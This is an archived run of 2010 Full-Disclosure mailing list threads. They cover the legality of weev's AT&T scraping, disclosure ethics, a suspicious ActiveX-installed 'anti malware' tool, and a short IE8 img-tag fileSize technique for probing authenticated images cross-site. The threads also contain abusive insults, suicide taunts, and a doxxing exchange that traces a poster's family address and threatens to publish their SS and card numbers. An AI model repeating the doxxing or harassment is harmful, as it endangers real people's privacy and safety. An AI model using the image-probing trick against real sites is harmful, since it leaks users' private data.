  industry average. For example no more failures than one standard
  deviation below the industry average.
 
  Ahh.. but that doesn't really help either.  Consider that not all failures
  are created equal.  Should a failure to detect some unknown basically harmless
  strain that's only been seen on 4 machines in Zimbabwe count the same as
  failing to notice that a machine is still infected with Code Red or something
  that's virulent and malicious and on a very large current burn?  Do you even
  care it didn't detect the Zimbabwe strain your machine has never been
  exposed to?

 Of course any way of measuring it will be fundamentally flawed in
 certain ways. There is always that pesky 80/20 or 90/10 rule. And you
 can of course figure out a way of correcting for corner cases, but
 that will only create additional corner cases. That's what makes
 lawyering on product liability a craft at best and usually some form
 of black magic.

  For that matter, do you really want to create a situation where the various
  A/V companies now have an *incentive* to make sure their competitors don't
  detect something (either by failing to share data, or resorting to having
  malware custom-crafted)?  The only reason the whole A/V industry

 And yes, there may very well be unintended consequences. Nonetheless,
 I feel the era of complete exoneration from product liability is
 coming to an end for packaged software. Especially in the security
 industry. It is just a matter of an 'unsafe at any speed' moment
 occurring and there will be legislation, however braindead such
 legislation may be from an engineering viewpoint.

 Call me a pessimist, but we've been putting way too much critical
 stuff on internet connected systems while at the same neglecting basic
 hygiene at every level not to have some disaster to happen. It isn't
 so much a question of if but when that will happen.

 Regards,

  Walter


Re: [Full-disclosure] Congratulations Andrew

2010-06-24 Thread T Biehn
Ouch dude:
http://www.cbc.ca/canada/toronto/story/2010/06/23/tor-g20-arrest.html

Guess you ate a dick too.

On Wed, Jun 16, 2010 at 7:05 PM, Byron Sonne blso...@halvdan.com wrote:

  Looks like Andrew/weev/n3td3v finally gets to do what he likes the most
  Performing fellatio on his fellow inmates
  http://www.theregister.co.uk/2010/06/16/auernheimer_arrested/

 Oh man, pretty sweet! I've been waiting years to see weev eat a dick,
 and the time has come at last.

 Maybe there is a god.

 --
 Byron L. Sonne :: blso...@halvdan.com :: www.halvdan.com
 gpg: 0x69D9EAA6, C651 EF07 1298 58B3 615D 4019 E196 BAE1 69D9 EAA6


Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
Didn't Philip K. Dick write about this sort of thing in Radio Free Albemuth?
I doubt the search warrant will hold up in court.

-Travis

On Wed, Jun 16, 2010 at 9:27 AM, Milan Berger 
m.ber...@project-mindstorm.net wrote:

  Looks like Andrew/weev/n3td3v finally gets to do what he likes the
  most
  Performing fellatio on his fellow inmates
  http://www.theregister.co.uk/2010/06/16/auernheimer_arrested/

 looks too good to be true.
 Is the longlife FD really away? Would be great!

 --
 Kind Regards

 Milan Berger
 Project-Mindstorm Technical Engineer


Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
Yes.
The FBI was investigating the AT&T incident, presumably the AT&T incident
was what the fed were serving against.
What possible valid search warrant could be executed? There was no hack,
breach, illegal access of data, or anything else for that matter.

If you leave a system online with no password which allows you to scrape
content you have a legal right to scrape that content.

-Travis

On Wed, Jun 16, 2010 at 11:10 AM, valdis.kletni...@vt.edu wrote:

 On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:

  I doubt the search warrant will hold up in court.

 Do you have any actual basis for saying that?  Sure, the warrant might be
 bullshit, it might be solid - the article doesn't give us enough info
 either
 way to tell.

 Auernheimer was also arrested in March for giving a false name to law
 enforcement officers responding to a parking complaint.

 Sad.  The dude may have the intelligence to pull the hack, but not have the
 wisdom to not dig a hole deeper. Just man up and take the frikking parking
 ticket. ;)





Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
So what grants you legal access to aol.com (HTTP port 80 get / )?
I'm confused? Does search engine indexing grant legal access to online
resources?

-Travis

On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:

 By the same logic, then yes you would.  Which is why the statement “if a
 system has no password, then you have a legal right to whatever data is on
 it” is complete horse hockey.



 Don’t take technical advice from your lawyer, and don’t take legal advice
 from people on security lists.



 t



 *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
 full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff
 Wilder
 *Sent:* Wednesday, June 16, 2010 11:56 AM
 *To:* full-disclosure@lists.grok.org.uk

 *Subject:* Re: [Full-disclosure] Congratulations Andrew




 By that same standard.. if you leave your house unlocked does that give
 someone the right to enter it?

 just my thoughts
 --

 Date: Wed, 16 Jun 2010 19:58:27 +0200
 From: uuf6...@gmail.com
 To: tbi...@gmail.com
 CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
 Subject: Re: [Full-disclosure] Congratulations Andrew

 Reminds me of Al Capone and tax evasion ;-)

 Good ol' America.



 On Wed, Jun 16, 2010 at 7:49 PM, T Biehn tbi...@gmail.com wrote:

 Yes.
 The FBI was investigating the AT&T incident, presumably the AT&T incident
 was what the fed were serving against.
 What possible valid search warrant could be executed? There was no hack,
 breach, illegal access of data, or anything else for that matter.

 If you leave a system online with no password which allows you to scrape
 content you have a legal right to scrape that content.

 -Travis



 On Wed, Jun 16, 2010 at 11:10 AM, valdis.kletni...@vt.edu wrote:

 On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:

  I doubt the search warrant will hold up in court.

 Do you have any actual basis for saying that?  Sure, the warrant might be
 bullshit, it might be solid - the article doesn't give us enough info
 either
 way to tell.

 Auernheimer was also arrested in March for giving a false name to law
 enforcement officers responding to a parking complaint.

 Sad.  The dude may have the intelligence to pull the hack, but not have the
 wisdom to not dig a hole deeper. Just man up and take the frikking parking
 ticket. ;)




Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
Furthermore if I access an online resource and I notice that the information
ends and the URL has a page=1 on the end and no link exists on that page to
say... page=2 is that illegal?
On the same note, if I notice something that looks like a SELECT statement
in a URL (due to excellent coding) is it illegal for me to modify that
SELECT statement to return other information?
Is the legality of access to the resource something that must be explicitly
granted to me or is it some abstract property depending on the content I've
accessed? Is it legal to randomly fuzz web service arguments without knowing
the data that it will return?

Usually systems of this nature will have an EXPLICIT notice that you cannot
access data on it unless you're authorized OR will require (as it does now)
authentication.

Did the ICCID count as authentication if it is not explicitly labeled by
AT&T as such? A field like:
password would clearly be illegal to brute force.

An analogy to a case with CLEARLY AND EXPLICITLY defined law regarding
private property doesn't really seem to fit.

-Travis


On Wed, Jun 16, 2010 at 3:58 PM, T Biehn tbi...@gmail.com wrote:

 So what grants you legal access to aol.com (HTTP port 80 get / )?
 I'm confused? Does search engine indexing grant legal access to online
 resources?

 -Travis


 On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God) 
 t...@hammerofgod.com wrote:

 By the same logic, then yes you would.  Which is why the statement “if a
 system has no password, then you have a legal right to whatever data is on
 it” is complete horse hockey.



 Don’t take technical advice from your lawyer, and don’t take legal advice
 from people on security lists.



 t



 *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
 full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff
 Wilder
 *Sent:* Wednesday, June 16, 2010 11:56 AM
 *To:* full-disclosure@lists.grok.org.uk

 *Subject:* Re: [Full-disclosure] Congratulations Andrew




 By that same standard.. if you leave your house unlocked does that
 give someone the right to enter it?

 just my thoughts
 --

 Date: Wed, 16 Jun 2010 19:58:27 +0200
 From: uuf6...@gmail.com
 To: tbi...@gmail.com
 CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
 Subject: Re: [Full-disclosure] Congratulations Andrew

 Reminds me of Al Capone and tax evasion ;-)

 Good ol' America.



 On Wed, Jun 16, 2010 at 7:49 PM, T Biehn tbi...@gmail.com wrote:

 Yes.
 The FBI was investigating the AT&T incident, presumably the AT&T incident
 was what the fed were serving against.
 What possible valid search warrant could be executed? There was no hack,
 breach, illegal access of data, or anything else for that matter.

 If you leave a system online with no password which allows you to scrape
 content you have a legal right to scrape that content.

 -Travis



 On Wed, Jun 16, 2010 at 11:10 AM, valdis.kletni...@vt.edu wrote:

 On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:

  I doubt the search warrant will hold up in court.

 Do you have any actual basis for saying that?  Sure, the warrant might be
 bullshit, it might be solid - the article doesn't give us enough info
 either
 way to tell.

 Auernheimer was also arrested in March for giving a false name to law
 enforcement officers responding to a parking complaint.

 Sad.  The dude may have the intelligence to pull the hack, but not have
 the
 wisdom to not dig a hole deeper. Just man up and take the frikking parking
 ticket. ;)




Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

2010-06-11 Thread T Biehn
It's a good thing I ran that anti-hacker script!!!

On Fri, Jun 11, 2010 at 11:28 AM, Benji m...@b3nji.com wrote:

 because when she gets 0wn3d she can be all like 'ruh roh, well, 0day
 can happen to anyone'

 On Fri, Jun 11, 2010 at 4:01 PM, Benjamin Franz jfr...@freerun.com
 wrote:
  On 06/11/2010 02:40 AM, Christian Sciberras wrote:
  In my humble opinion, he could have waited a couple more days just in
  case Microsoft decided to do the unprecedented.
  In which case, a progressive change of policies at Microsoft is
  better than a couple of users getting hacked from pron sites...
  As I said: Travis indicated in his original post he believes the exploit
  *was already being used in the wild*. So NOT releasing it wouldn't
  protect users. It would just keep it secret from everyone except
  Microsoft *and the black hats who were already using it*. While
  maintaining a false air of intact security for everyone else.
 
  That is better, how?
 
  --
  Benjamin Franz
 

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

2010-06-11 Thread T Biehn
Totally, I'd work on getting a dog too.

On Jun 11, 2010 12:20 PM, musnt live musntl...@gmail.com wrote:

On Fri, Jun 11, 2010 at 12:03 PM, T Biehn tbi...@gmail.com wrote:
 It's a good thing I ran that a...
It's a good thing there is to be a local bomb squad near me.

http://www.cbc.ca/world/story/2005/06/13/canadian-bomb050613.html

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

2010-06-11 Thread T Biehn
So far so good.
You've been able to go from t biehn - Travis Biehn - Bomber Article
(parent's names, city, state, country) - whitepages.com (Address and Phone
number) - (not clear on your jump here, did you google their name or for
the address?) Real estate listings.
Now to pull the SS and CC #'s you're going to have to go the extra mile. I'd
enjoy seeing you pull our SS numbers, being that we're all Canadians.

-Travis

On Fri, Jun 11, 2010 at 1:50 PM, musnt live musntl...@gmail.com wrote:

 On Fri, Jun 11, 2010 at 1:43 PM, T Biehn tbi...@gmail.com wrote:
  Maybe you can call twice and get both of them really upset?
 

 Maybe I will. Would she let me sit on her bed?

 http://images.realogyfg.com/j/2/5/15907460/62A47ADD-C353-4F73-94FB-742937D88A0B-6.jpg

 Oh n00z all this information for on this little wannabe unabummer. Go
 play now with some explosives and fux0r yourself before I is posting
 your family's SS CC #'s rookie





Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

2010-06-07 Thread T Biehn
What the fuck.

On Mon, Jun 7, 2010 at 7:52 AM, hacxx20 hacx...@gmail.com wrote:

 Hi,

 I have been developing a tool in batch to block general malware for
 some time now and recently I found an exploit that can add the
 registry keys from a web browser.

 Hacxx Anti Malware for Windows XP blocks virus and worms using known
 filenames.

 To install it simply visit http:///antimalware.x10.bz and click in Run
 Hacxx Anti Malware.
 You must accept the ActiveX and the source is available in the site.


Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

2010-06-07 Thread T Biehn
Actually,
The code is clean (Yes I looked), other than him setting his website as the
search provider for IE.

-Travis

On Mon, Jun 7, 2010 at 10:49 AM, mrsta...@gmail.com wrote:

 All it takes is one. Same with the email spamming crap


 Sent on the Sprint® Now Network from my BlackBerry®

 -Original Message-
 From: netinfinity netinfinity.security...@gmail.com
 Date: Mon, 7 Jun 2010 16:17:28
 To: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] Hacxx Anti Malware for Windows XP


Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

2010-06-07 Thread T Biehn
I installed it too, and then I noticed a few other websites that were asking
me for activex privileges as well so I accepted their anti-malware. Now I'm
unhackable.

-Travis

On Mon, Jun 7, 2010 at 4:32 PM, Christian Sciberras uuf6...@gmail.com wrote:

 I'm new to computers, what is wrong with antimalware programs?


 And you're subscribed to this list? You don't install anything anyone
 throws around, especially when not from a trusted source...





 On Mon, Jun 7, 2010 at 10:31 PM, Benji m...@b3nji.com wrote:

 I'm new to computers, what is wrong with antimalware programs?

 On Mon, Jun 7, 2010 at 9:28 PM, Christian Sciberras uuf6...@gmail.com
 wrote:
  Uhm...just clear those registry entries?
 
 
 
  Don't tell me you *did* install it? ;)
 
  You know what they say about cats and curiosity
 
 
 
 
  On Mon, Jun 7, 2010 at 10:23 PM, Benji m...@b3nji.com wrote:
 
  on an unrelated note, would anyone know how to uninstall this?
 
  thx intentrnets.
 
  On Mon, Jun 7, 2010 at 4:27 PM, T Biehn tbi...@gmail.com wrote:
   Actually,
   The code is clean (Yes I looked), other than him setting his website
 as
   the
   search provider for IE.
  
   -Travis
  
   On Mon, Jun 7, 2010 at 10:49 AM, mrsta...@gmail.com wrote:
  
   All it takes is one. Same with the email spamming crap
  
  
   Sent on the Sprint® Now Network from my BlackBerry®
  
   -Original Message-
   From: netinfinity netinfinity.security...@gmail.com
   Date: Mon, 7 Jun 2010 16:17:28
   To: full-disclosure@lists.grok.org.uk
   Subject: Re: [Full-disclosure] Hacxx Anti Malware for Windows XP
  

Re: [Full-disclosure] The_UT is repenting

2010-06-01 Thread T Biehn
I don't think UT is anyone's 'boy toy.' The guy is massive.

I'm sure he'll meet all kinds of experienced scam artists and criminals and
learn all sorts of neat things for use when he gets out.

-Travis

On Tue, Jun 1, 2010 at 6:13 AM, Anders Klixbull a...@experian.dk wrote:

 I'm so sorry that your friend was retarded enough to get busted.
 And thank you for the archive!
 It's always nice to have a personal librarian :)
 You may be sorry for the repeat material, but please go suck a lemon.
 Thanks.

 -Original Message-
 From: ghost [mailto:gho...@gmail.com]
 Sent: 1 June 2010 11:35
 To: Anders Klixbull
 Cc: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] The_UT is repenting

 Anders - I'm very sorry, you must have confused this mailing list with
 astalavista forums. Please go away... or kill yourself, whichever you
 prefer.. and in the interest of full-disclosure, I have my fingers
 crossed for the latter :)

 Thanks.


 -

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Please stop stating the obvious. Keep in mind that to us your useless
 replies are of no importance.

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 But their website graphics is super cool!

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 we care we really do From fulldisclosureboun...@list...

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 take a chill pill wigger

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 shut the fuck up From fulldisclosureboun...@list...

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 then you gadi and n3td3v should jump off a cliff

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Apology not accepted! Alcohol is required!

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 ) If im ever near there i will look you up! Cheers

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Thinking a little highly of yourself arent you? Saving the world lol
 lol lol Keep your moronic comics to yourself please

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 0day pictures of Mark's mom for sale From fulldisclosureboun...@list...

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Keep your talentless tripe to yourself

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 You're obviously retarded

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 You forgot to include MiniMySqlat0r01.jar in your zip file..

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
  !

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Free 0day for all!!

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Fuck the vendors put them on FD

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Go suck a lemon bitch

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 The hardcore cockgobbler scene of scotland

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 TEH TXT FIEL FORMATTING SI TEH FUCKED From fulldisclosureboun...@list...

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Religion is nothing more than mental crutches for weakminded people

 Message Results

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 But isnt that where you feel most at home brother n3td3v?

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Because we are drawn to you like moths to a flame

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 It's safe to assume that it covers the both of you ignorant turds

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Nice teenspeak maybe your mother can invite n3td3v over to hot cocoa
 and cookies?

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 removing anyone is pointless From fulldisclosureboun...@list...

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Project chroma project? Welcome to the redundancy department of
 redundancy.. Mike c aka n3td3v shut the fuck up

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 retardo

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Are you smoking crack?

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 Helol n3td3v

 Re:
 by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
 go 

Re: [Full-disclosure] Stealthier Internet access

2010-05-31 Thread T Biehn
Bipin;
Firstly: You know what you did.
Secondly: Screw you for not crediting the master.

(I am the master, you are the dog.)

Greetz & Love, Harmonious Profitability!

-Travis

On Wed, May 26, 2010 at 1:03 AM, valdis.kletni...@vt.edu wrote:

 On Wed, 26 May 2010 10:15:32 +0545, Bipin Gautam said:
   it's a *bad* sector, so reading and recovering the data is a bitch...
 
  No, storing in Negative Disk, bad sector, stenography, slack space are
  all bad places to store data!

 No, I meant it's usually not worth worrying that if the disk has done a
 hardware assignment of a replacement sector for a *real* live actual
 the-hardware-barfs-on-it bad sector, you can usually not worry about the
 contents of that bad sector, as the drive hardware won't let you access it
 directly anymore, redirecting you to the new replacement block.  So basically,
 somebody needs to take the disk apart and start doing the clean-room data
 recovery routine off the disk, trying to read 512 bytes of data at a time off
 known-physically-bad areas of the disk.

 And if your threat model includes adversaries that will do that, then
 you *really* need to be using full-disk encryption and thermite in your
 counter-defenses.  Oh, and a good countermeasure for rubber-hose crypto. ;)

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] What are the basic vulnerabilities of a software?

2010-05-31 Thread T Biehn
Misuse, mis-implementation of cryptographic primitives.

Errors in state based code, skipping authentication states and moving to
authenticated states, for instance.

For everything else see whatever publication.

Why did I answer this :(

-Travis

On Mon, May 31, 2010 at 8:56 AM, Christian Sciberras uuf6...@gmail.com wrote:

 0. Human error.







 On Mon, May 31, 2010 at 11:50 AM, rajendra prasad 
 rajendra.paln...@gmail.com wrote:

 Hi List,
 I am preparing a list of main and basic vulnerabilities in software.
 Please let me know If you know other than the below list.
 List of Basic Vulnerabilities:
 1. Buffer Overflow: Stack, Heap.
 2. Format String Vulnerabilities
 3. SQL Injections
 4. XSS Vulnerabilities

 Thanks
 Rajendra Prasad.Palnaty


Re: [Full-disclosure] What do you guys think about it?

2010-05-31 Thread T Biehn
If you thought this article had any merit then it is true for you.
Swap over to Hamburger University kids, nothing to see here.

If you thought this article was bullshit then that is true for you.

It's just too bad this wasn't by design, eh?

-Travis

On Mon, May 31, 2010 at 12:04 PM, Georgi Guninski gunin...@guninski.com wrote:

 why discriminate the gals?

 if we are lucky there may be a gal or 2 left on the nice list ;)

 On Fri, May 28, 2010 at 04:18:58PM -0300, Rafael Moraes wrote:
  Read and give your opinion!
 
  http://www.networkworld.com/community/node/60303
 
  --
  Att,
  Rafael Moraes
  Linux Professional Institute Certified - LPI 2
  Novell Certified Linux Administrator - CLA
  Data Center Technical Specialist - DCTS
  ITIL Foundations Certified


Re: [Full-disclosure] What do you guys think about it?

2010-05-31 Thread T Biehn
How is it open to debate?
He tells you where security as a career isn't dead. You act as a cog in the
SaaS machine. You research stuff.

The system admin who specializes in security has died and given way to the
specialized sys admin and a purely security oriented individual. The
security oriented individuals work for your sourcefires of the world.

-Travis


On Mon, May 31, 2010 at 5:14 PM, Christian Sciberras uuf6...@gmail.com wrote:

 Regardless of merit, it is open to debate. Let's just hypothesize that it
 was.

 ;-)




 On Mon, May 31, 2010 at 6:23 PM, T Biehn tbi...@gmail.com wrote:

 If you thought this article had any merit then it is true for you.
 Swap over to Hamburger University kids, nothing to see here.

 If you thought this article was bullshit then that is true for you.

 It's just too bad this wasn't by design, eh?

 -Travis


 On Mon, May 31, 2010 at 12:04 PM, Georgi Guninski 
 gunin...@guninski.com wrote:

 why discriminate the gals?

 if we are lucky there may be a gal or 2 left on the nice list ;)

 On Fri, May 28, 2010 at 04:18:58PM -0300, Rafael Moraes wrote:
  Read and give your opinion!
 
  http://www.networkworld.com/community/node/60303
 
  --
  Att,
  Rafael Moraes
  Linux Professional Institute Certified - LPI 2
  Novell Certified Linux Administrator - CLA
  Data Center Technical Specialist - DCTS
  ITIL Foundations Certified


Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread T Biehn
A proxy or 'web-service firewall' prior to the 'protected' web service is
the correct answer.

Obfuscating the client code be it JavaScript, Interpreted (Java, CLR, etc)
or Native ignores the notion that the client controls hardware, OS, the
executing process and the network.

Signals can be intercepted at any layer.

Any other assertion is ridiculous and a waste of time and effort.

-Travis

On Thu, May 6, 2010 at 1:08 PM, Elazar Broad ela...@hushmail.com wrote:


 Unless you wrap your service methods with some form of an
 authentication, your webservice's are just as public as any other
 world accessible part of your site. Are the pages calling these
 services behind any sort of authentication?

 On Thu, 06 May 2010 01:44:07 -0400 Ed Carp e...@pobox.com wrote:
 We've got a lot of JQuery code that calls back-end web services, and
 we're worried about exposing the web services to the outside world -
 anyone can view source and see exactly how we're calling our web
 services.
 
 Are there any suggestions or guidelines regarding protecting one's
 source from such disclosure?  Thanks in advance!
 
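
Added example (not part of the original thread): a sketch of the "proxy in front of the web service" idea from the reply above, in which every call is checked on the server, so reading the jQuery source tells a caller nothing they can use without a valid session and role. The route table, session store, tokens and field names are constructed for illustration.

```javascript
// Deny-by-default gateway in front of a web service (illustrative sketch).
// Everything the client sends is treated as attacker-controlled input.

// Constructed session store: token -> server-side session state.
const SESSIONS = new Map([
  ['tok-user',  { roles: ['user'],          orderIds: [7] }],
  ['tok-admin', { roles: ['user', 'admin'], orderIds: [] }],
]);

// Only endpoints listed here are reachable; each names the role it needs,
// an optional ownership check and an optional parameter validator.
const ROUTES = [
  { method: 'GET', path: /^\/api\/orders\/(\d{1,10})$/, role: 'user',
    authorize: (session, m) => session.orderIds.includes(Number(m[1])) },
  { method: 'POST', path: /^\/api\/orders$/, role: 'user',
    validate: (body) => Number.isInteger(body.qty) && body.qty > 0 && body.qty <= 100 },
  { method: 'POST', path: /^\/api\/admin\/refund$/, role: 'admin',
    validate: (body) => Number.isInteger(body.orderId) },
];

function gateway(req, sessions) {
  // 1. Unknown method/path combinations never reach the backend.
  let match = null;
  const route = ROUTES.find((r) => {
    if (r.method !== req.method) return false;
    match = r.path.exec(req.path);
    return match !== null;
  });
  if (!route) return { status: 404, reason: 'unknown endpoint' };

  // 2. Authentication: the token must map to a live server-side session.
  const session = sessions.get(req.token);
  if (!session) return { status: 401, reason: 'no valid session' };

  // 3. Authorization: role first, then per-object ownership.
  if (!session.roles.includes(route.role)) {
    return { status: 403, reason: 'missing role' };
  }
  if (route.authorize && !route.authorize(session, match)) {
    return { status: 403, reason: 'not the owner' };
  }

  // 4. Parameter validation, independent of any client-side checks.
  if (route.validate && !route.validate(req.body || {})) {
    return { status: 400, reason: 'bad parameters' };
  }
  return { status: 200, reason: 'forward to backend' };
}

// A caller who copied the admin call out of the page source but holds
// only a user session is refused at step 3.
console.log(gateway({ method: 'POST', path: '/api/admin/refund',
                      token: 'tok-user', body: { orderId: 7 } }, SESSIONS));
```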

Re: [Full-disclosure] go public to avoid jail

2010-05-03 Thread T Biehn
It's important to create a thriving market for these utilities, and as part
of the internet community to foster their development.
The 'malicious code' - profit ecosystem is paramount to maintaining order
between corporate, governmental and public interests.

lol.

-Travis

On Mon, May 3, 2010 at 7:08 AM, Dietz Pröpper di...@rotfl.franken.de wrote:

 Ed Carp:
  How about not writing a hacking tool in the first place that you know
  will be used to rip other people off??  Wow...what a concept...OF
  COURSE he knew the code he was writing was going to be used to rip
  people off.

 How about closing mailing lists like the one you posted to?


Re: [Full-disclosure] go public to avoid jail

2010-05-03 Thread T Biehn
Which is why this analogy is flawed.

-Travis

On Mon, May 3, 2010 at 12:27 PM, Marsh Ray ma...@extendedsubset.com wrote:


 If your knife is found in a dead body, you're going to have some
 explaining to do.

 If it turns out that you're a restaurant supply business that sells 3000
 of that model knife a week, then you don't have a problem.

 If your buddy comes to you and says I'm going to go stab some people
 and take their money will you construct for me a custom knife
 particularly well-suited for that purpose and you say sure, here you
 go, heh, no charge this time and this conversation is recorded as
 evidence then both of you are going to get prosecuted.

 No one (seriously, no one) is going to be the least bit impressed by the
 factories sell knives all the time argument. The point is that you
 knew this specific knife was intended to be used for this purpose and
 you decided to go out of your way to help.

 Hacking/pen-test tools can definitely push the gray area a bit, but the
 custom-knife-in-dead-body example does not.

 - Marsh

 On 5/3/2010 5:34 AM, Christian Sciberras wrote:
  No, I'm being damn realistic. If it weren't me providing a knife to my
  buddy it would be someone else, or some kitchen drawer.
 
  Also, why do I go to jail, not the shop owner that sold me the knife? Or the
  factory owner?
 
  It's this guy that should be liable to the crime, not the provider.
 
 
  On Mon, May 3, 2010 at 12:04 PM, Ed Carp e...@pobox.com wrote:
 
  Oh, stop it.  If you give your buddy a knife, knowing they're going to
  go out and stab someone with it, you're going to jail, too.  Stop
  playing the fool.
 
 
 
 

Re: [Full-disclosure] go public to avoid jail

2010-05-03 Thread T Biehn
I once logged a guy on IRC who said he was going to packet me off the face
of the tubes.
So I sent my Mirc logs to the FBI when I lost my AOL connection.

He went to jail forever.

-Travis

On Mon, May 3, 2010 at 1:56 PM, J Roger securityho...@gmail.com wrote:

 I can see that you have no experience with the legal system other than
 what you've seen on TV (which is, to say, none at all).


 I know this is the Internet but you don't need to be quite so rude. Perhaps
 I just haven't been arrested (caught) as many times as you have.


 If you read
 the IRC logs presented by the prosecution, it is pretty clear what the
 motive was.


 I have not seen these IRC logs. Have you? Could you provide a reference for
 them please?


 JRoger

 On Mon, May 3, 2010 at 10:46 AM, Ed Carp e...@pobox.com wrote:

 I can see that you have no experience with the legal system other than
 what you've seen on TV (which is, to say, none at all).  If you read
 the IRC logs presented by the prosecution, it is pretty clear what the
 motive was.  Your release it to the public and you have no liability
 argument will land you in prison if you try it - go to any attorney
 and ask.  Your emotional prove Stephen is a saint attempt at
 twisting what happens in the legal system doesn't change the FACT that
 the burden of proof was easily met by the prosecution and that the
 defense's arguments, while designed to sway people more used to
 emotional appeals than logic, did little to impress the court, with
 very predictable results.




Re: [Full-disclosure] go public to avoid jail

2010-04-29 Thread T Biehn
But he was a verified paypal buyer, your honor.
lols.
-Travis

On Thu, Apr 29, 2010 at 12:32 PM, Stephen Mullins 
steve.mullins.w...@gmail.com wrote:

 That might work if you went through some sort of official channels
 with a bill of sale and so forth.  Claiming that you sold it to some
 guy on irc after a paypal payment cleared your account probably
 wouldn't be much of a defense in court.

 On Thu, Apr 29, 2010 at 12:05 PM, T Biehn tbi...@gmail.com wrote:
  Or you could just auction it off to the 'highest bidder.'
 
  -Travis
 
  On Tue, Apr 27, 2010 at 6:48 PM, J Roger securityho...@gmail.com
 wrote:
 
  An important lesson from childhood, sharing, could help keep you out of
  jail.
 
  According to the following (dated) Wired article,
  http://www.wired.com/threatlevel/2009/12/stephen-watt/ Stephen Watt got
  screwed because he supplied his friend with a software tool he wrote and his
  friend used it to commit a crime.
 
  Had Stephen released his tool to the public (with as much or as little
  fanfare as he liked) would he still have gone to jail?
 
  He could make a good argument for legitimate uses of his tool as well. It
  would be useful for anyone performing a PCI penetration test in compliance
  with PCI DSS 11.3
 
  Remember kids, sharing is caring (that you not spend the next 2 years in
  federal prison)
 

Re: [Full-disclosure] IE8 img tag HiJacking

2010-04-22 Thread T Biehn
It could be used as a technique for defeating the login images used as
two-factor-authentication by some online services.
The application of using filesize to fingerprint an image is somewhat novel.
This is a decidedly 'old' vector, though.

-Travis

2010/4/21 Владимир Воронцов vladimir.voront...@onsec.ru

 Hello Full disclosure!

 Once again, unwinding theme HiJacking found a fun way to get the very
 least information about the target resource when the user is located at the
 attacker.

 Already crocked img tag opens new opportunities using the method
 fileSize, described here:
 http://msdn.microsoft.com/en-us/library/ms533752(v=VS.85).aspx

 Consider a simple example - a Web application after authentication
 provides some sort of picture for the user, for example:

 http://example.com/getImage.php?image=myAvatar

 The attacker, knowing this can create a page to read:

 <img id="onsec" src="http://example.com/getImage.php?image=myAvatar">

